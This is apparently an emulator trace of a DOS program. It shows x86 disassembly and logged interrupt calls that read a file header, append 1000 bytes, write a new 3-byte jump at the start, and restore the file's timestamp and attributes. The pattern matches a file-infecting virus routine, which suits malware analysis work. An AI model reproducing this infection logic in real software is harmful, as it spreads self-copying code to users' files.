2018-12-25T12:36:15.801216585Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.803489455Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.809881827Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:15.811843153Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.82147112Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:15.822879315Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.829261084Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:15.831340574Z 62 PC: 12c6d | Close file
2018-12-25T12:36:15.839104862Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:15.848954817Z 26 PC: 12c89 | Set disk transfer address